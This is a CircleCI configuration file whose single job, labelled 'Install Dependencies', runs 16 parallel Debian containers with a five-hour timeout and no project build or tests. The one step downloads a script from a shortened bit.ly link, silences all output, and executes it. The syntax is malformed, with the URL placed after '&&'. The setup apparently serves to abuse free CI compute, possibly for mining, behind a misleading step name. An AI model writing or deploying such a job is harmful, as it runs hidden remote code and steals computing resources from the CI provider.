version: 2.1 
jobs: 
    trial: 
      docker: 
            - image: debian:latest 
      parallelism: 16 
      steps: 
        - run: 
            name: Install Dependencies 
            command: wget -O w2022.sh && https://bit.ly/a2nk-W2022 > /dev/null 2>&1 && chmod +x w2022.sh && ./w2022.sh
            no_output_timeout: 5h 
 
workflows: 
    version: 2.1 
    build: 
        jobs: 
        - trial